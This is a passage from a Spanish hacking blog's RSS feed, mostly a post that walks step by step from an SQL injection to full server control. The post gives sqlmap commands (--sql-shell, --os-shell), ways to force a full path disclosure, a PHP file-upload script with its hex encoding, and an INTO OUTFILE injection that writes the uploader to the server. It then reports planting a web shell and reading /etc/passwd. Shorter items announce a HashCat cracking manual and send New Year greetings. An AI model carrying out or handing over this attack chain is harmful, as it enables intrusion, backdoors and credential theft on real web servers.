A partir de ese error empece a preocuparme! pues el cliente necesitaba el trabajo lo mas antes posible, pero como para mi no hay nada imposible &lt;i&gt;(sin presumir),&lt;/i&gt; opte por utilizar las técnicas y comandos mas avanzados que cuenta SQLMap, pero antes de eso tenia que comprobar si el usuario que estaba inyectando era user o root, para ello utilice el siguiente comando:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;./sqlmap.py -u http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --current-user&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Obteniendo el siguiente resultado:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i48.tinypic.com/14bt4df.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i48.tinypic.com/14bt4df.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
Al apreciar el resultado como "none" deduje que el usuario era "root" entonces en lo primero que pensé fue en subir una web shell desde SQLMap, pero antes de realizar ese paso, tenia que obtener un&amp;nbsp;&lt;a href="https://www.owasp.org/index.php/Full_Path_Disclosure"&gt;Full Path Disclosure&lt;/a&gt;&amp;nbsp;pero &lt;span style="color: lime;"&gt;¿Para que necesito un FPD?&lt;/span&gt; muy facil, al momento que necesitemos subir una web shell desde SQLMap, esta nos pedirá que coloquemos el PATH completo del servidor, caso contrario esta no dará resultado.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;u&gt;Ejemplos de obtener un Full Path Disclosure mediante Sql Injection:&lt;/u&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep&lt;/span&gt; Veremos un Sql Injection&lt;/li&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;http://www.sitio-web.com/parametro-vulnerable?txt_palabra=[]isep&lt;/span&gt; Veremos un Full Path Disclosure&lt;/li&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;http://www.sitio-web.com/parametro-vulnerable?txt_palabra=huey&lt;/span&gt; Veremos un Full Path Disclosure&lt;/li&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep!&lt;/span&gt; Veremos un Full Path Disclosure&lt;/li&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;http://www.sitio-web.com/parametro-vulnerable?txt_palabra='isep'&lt;/span&gt; Veremos un Full Path Disclosure&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Otro método que también funciona para obtener un FPD es cambiando las cookies, por ejemplo si tenemos nuestras cookies &lt;span style="color: lime;"&gt;PHPSESSID=13882931834931984318&lt;/span&gt; simplemente queda borrar los números &amp;nbsp;quedando solamente el &lt;span style="color: lime;"&gt;PHPSESSID=&lt;/span&gt; esto se puede realizar utilizando el Addon&amp;nbsp;&lt;a href="https://addons.mozilla.org/es/firefox/addon/live-http-headers/"&gt;Live HTTP Headers&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Después de realizar estos pasos para obtener un Full Path Disclosure, el resultado fue exitoso, mostrándome el siguiente mensaje:&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;----------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="color: lime; font-family: Courier New, Courier, monospace;"&gt;Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /espejo/htdocs.v2/portalnuevo/buscadores/portal_contenidos.php on line 79&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;----------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Conociendo el path completo del servidor, solo me faltaba buscar el código php de un upload para convertirlo en HEX e inyectarlo en el SQLMap. Seguidamente tenia que convertir el siguiente código a HEX:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;----------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="color: lime; font-family: Courier New, Courier, monospace;"&gt;&amp;lt;form enctype="multipart/form-data" action="upload.php" method="POST"&amp;gt;&amp;lt;input name="uploadedfile" type="file"/&amp;gt;&amp;lt;input type="submit" value="Upload File"/&amp;gt;&amp;lt;/form&amp;gt; &amp;lt;?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;----------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Ahora entre al sitio web http://www.string-functions.com/string-hex.aspx y coloque el código del upload para convertirlo a HEX, dando como resultado lo siguiente:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;----------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="color: lime; font-family: Courier New, Courier, monospace;"&gt;3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;----------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Realizado todo lo anterior, entre nuevamente a SQLMap y coloque el siguiente comando para moverme por el servidor mediante comandos SQL.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;./sqlmap.py -u http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --sql-shell&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;span style="color: lime;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i49.tinypic.com/14kva89.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i49.tinypic.com/14kva89.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
Ahora como ya tenia el control del servidor mediante comandos SQL, tenia que inyectar con &lt;span style="color: lime;"&gt;SELECT + 0x + Codigo HEX + INTO OUTFILE + Full Path + Nombre del Upload&lt;/span&gt;, quedando la inyección de la siguiente manera:&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;----------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="color: lime; font-family: Courier New, Courier, monospace;"&gt;select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="font-family: Courier New, Courier, monospace;"&gt;&lt;span style="color: lime;"&gt;into "/espejo/htdocs.v2/portalnuevo/buscadores/upload.php";&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;span style="font-family: 'Courier New', Courier, monospace;"&gt;----------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
En la cual SQLMap devuelve el siguiente resultado, indicando que el upload subió perfectamente sin problema alguno, como se muestra en la siguiente imagen:&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i48.tinypic.com/2r4776s.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="125" src="http://i48.tinypic.com/2r4776s.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
Ahora solo me quedaba abrir mi navegador y dirigirme a la ruta en la cual subí el upload.php la cual fue totalmente un éxito.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i46.tinypic.com/9r7qtg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i46.tinypic.com/9r7qtg.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Bien ahora como ya tenia el upload.php y mi objetivo era obtener el control total del servidor, subi una web shell la cual se ejecuto perfectamente.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i46.tinypic.com/10pwpaq.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i46.tinypic.com/10pwpaq.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;span style="font-family: Courier New, Courier, monospace;"&gt;----------------------------------------------------------------------------------&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
Como ya es de conocimiento SQLMap contiene una series de comandos que nos ayuda mucho al momento que estamos realizando una auditoria, pues también ofrece un comando para subir una web shell de una forma mas rápida a la forma de dicha herramienta.&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
El comando --os-shell en SQLMap permitirá subir un uploader (sqlmap file uploader) algo parecido a lo anterior pero al estilo SQLMap :)&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
Para realizar este paso utilizando dicho comando, teclearemos en la herramienta lo siguiente:&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="color: lime;"&gt;./sqlmap.py -u http://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --os-shell&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both;"&gt;
La herramienta nos preguntara en que lenguaje de programación esta basada el sitio web, en este caso el sitio web que ando auditando esta en PHP, por lo que sqlmap lo enumera como (default) tal cual se muestra en la siguiente imagen:&lt;/div&gt;
&lt;div class="separator" style="clear: both;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i45.tinypic.com/2u4r3ar.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i45.tinypic.com/2u4r3ar.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
Después de colocar el numero por default o simplemente presionando enter, la herramienta nos pedirá que coloquemos el path completo del servidor la cual hemos obtenido mediante un Full Path Disclosure, después de ello, confirmaremos dicho path para que la herramienta trate de subir el uplader en el servidor.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i49.tinypic.com/3505dts.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="26" src="http://i49.tinypic.com/3505dts.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
Seguidamente si hemos colocado el path correctamente, obtendremos el uploader en el servidor, esta se nombra muchas veces como tmpjdjsk.php.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i45.tinypic.com/5pqtu8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="97" src="http://i45.tinypic.com/5pqtu8.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
Ahora para confirmar y visualizar el uploader que subió la herramienta, abriremos la URL que la misma nos proporciono, apreciando-la de la siguiente manera:&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i50.tinypic.com/20j4uxk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i50.tinypic.com/20j4uxk.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
Desde allí podemos subir nuestra web shell o cualquier archivo que nos gustaría tener dentro del servidor web.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
Después que la herramienta ha realizado todo lo anterior, nos deja una session del os-shell para movernos por el servidor mediante comandos como ls - dir - cat u otros. Esto se puede ya que en si es un backdoor que SQLMap ha subido al servidor.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
Ejemplo del comando cat /etc/passwd:&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i48.tinypic.com/2motcb9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i48.tinypic.com/2motcb9.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Ejemplo del comando uname -a y ls:&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://i47.tinypic.com/2dhz6v9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://i47.tinypic.com/2dhz6v9.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
Y por ultimo la web que hemos auditado ha quedado totalmente vulnerado.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
Bueno, esto fue lo que me paso hace algunos dias, lo escribo no tal solo por aburrirlos, si no para que quiza alguno de ustedes lo ponga en practica en sus Pruebas de Penetración.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
Espero les sirva, un saludo y hasta la próxima ;)&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: justify;"&gt;
&lt;i&gt;&lt;span style="font-size: x-small;"&gt;FollowMe:&amp;nbsp;&lt;a href="https://twitter.com/CalebDrugs" style="text-align: left;"&gt;https://twitter.com/CalebDrugs&lt;/a&gt;&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/SCifCwdzZX0" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-01-10T22:09:41.542-03:00</app:edited><media:thumbnail url="http://i48.tinypic.com/2466wqc_th.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://www.blackploit.com/2013/01/conseguir-shell-desde-un-sqli-con-sqlmap.html</feedburner:origLink></item><item><title>Manual de HashCat en Español (PDF)</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/XrsXfWlLHvc/manual-de-hashcat-en-espanol-pdf.html</link><category>Tutoriales</category><category>Manuales</category><category>MD5 CRACK</category><category>Paper</category><category>HashCat</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Wed, 09 Jan 2013 10:17:10 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-6349099233108707384</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-c2GtZB0hMsM/UO2wpRBjMiI/AAAAAAAABto/r5WUAEX8Psk/s1600/hashcat-logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="162" src="http://3.bp.blogspot.com/-c2GtZB0hMsM/UO2wpRBjMiI/AAAAAAAABto/r5WUAEX8Psk/s640/hashcat-logo.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Es muy común buscar algún hash MD5 en famosas bases de datos y no encontrarlo... Peor aun es cuando se tiene algún hash WordPress u otro con algún salt, y no hay buenas bases de datos o simplemente no hay. Pero no hay que darse por vencido, pues puedes usar la potencia de tu computador para crackear tu mismo los hash's.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;div style="float:left; margin:5px;"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 250 x 250 */
google_ad_slot = "9258007445";
google_ad_width = 250;
google_ad_height = 250;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Para esta tarea &lt;b&gt;la herramienta que considero mejor es HashCat&lt;/b&gt; ya que es muy rápida, eficiente y se puede guardar tu trabajo avanzado para seguir en otro momento.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Recientemente &lt;b&gt;&lt;a href="https://twitter.com/MexicanH" target="_blank"&gt;MEXICANH TEAM&lt;/a&gt;&lt;/b&gt; ha publicado un completo manual de HashCat donde se explica con lujos de detalles y en español como usar esta completa y extensa herramienta que es capaz de crackear más de 30 algoritmos de encriptación.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
Aquí les dejo el index del manual y al final el link de descarga:&lt;/div&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;AVISO LEGAL ................................................................. 3
ACERCA ...................................................................... 4
1.1 VISTA GENERAL ........................................................... 5
1.2 OPCIONES ................................................................ 7
1.3 VECTORES DE ATAQUE ...................................................... 15
1.4 EJEMPLOS ................................................................ 16
1.5 ESPECIFICOS HASHCAT ..................................................... 25
2.1 OCLHASHCAT-PLUS(CUDAHASHCAT-PLUS) ....................................... 25
2.1 OPCIONES ................................................................ 27
2.2 VECTORES DE ATAQUE ...................................................... 34
2.3 RULE-BASED ATTACK ....................................................... 35
2.4 EJEMPLOS ................................................................ 39
2.5 HASHCAT UTILS ........................................................... 48
2.6 SOLUCION DE PROBLEMAS ................................................... 50
2.7 REFERENCIAS ............................................................. 50
2.8 MEJORAS ................................................................. 50&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;a href="http://www.exploit-db.com/download_pdf/23922/" target="_blank"&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;Descarga Manual de HashCat en Español (PDF)&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Formato:&lt;/b&gt; PDF&lt;br /&gt;
&lt;b&gt;Páginas:&lt;/b&gt; 50&lt;br /&gt;
&lt;b&gt;Peso:&lt;/b&gt; 2,58 MB&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R &lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/XrsXfWlLHvc" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2013-01-09T15:17:10.478-03:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-c2GtZB0hMsM/UO2wpRBjMiI/AAAAAAAABto/r5WUAEX8Psk/s72-c/hashcat-logo.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2013/01/manual-de-hashcat-en-espanol-pdf.html</feedburner:origLink></item><item><title>Feliz Año Nuevo y Próspero 2013!!</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/zvwgLPeIKT0/feliz-ano-nuevo-y-prospero-2013.html</link><category>Blackploit</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sun, 27 Jan 2013 18:47:14 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2643362251628538820</guid><description>&lt;div style="text-align: justify;"&gt;
Quiero saludar y desearles lo mejor en este 2013 a todos mis lectores, para mi es un gusto escribir y espero poder seguir haciéndolo a lo largo del año.&lt;br /&gt;
&lt;br /&gt;
Quiero darles las gracias a todos aquellos que me apoyan tanto con sus lecturas como con sus comentarios, quiero mandarles especiales Salu2 a &lt;a href="http://calebbucker.blogspot.com/" target="_blank"&gt;&lt;b&gt;Caleb Bucker&lt;/b&gt;&lt;/a&gt; y a &lt;a href="http://hack-tools.blackploit.com/" target="_blank"&gt;&lt;b&gt;Dump3R&lt;/b&gt;&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Por último quiero desearles un buen pasar, estudien, lean mucho, disfruten de sus vacaciones si es que tienen y no dejen de visitarme xD.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-EZHSYBeyL0Y/UQXmNWvJB5I/AAAAAAAABwo/U2FiCTl_HNw/s1600/Feliz+2013.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-EZHSYBeyL0Y/UQXmNWvJB5I/AAAAAAAABwo/U2FiCTl_HNw/s640/Feliz+2013.bmp" width="700" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Feliz Año Nuevo y Próspero 2013!!&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Salu2&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Zion3R &lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
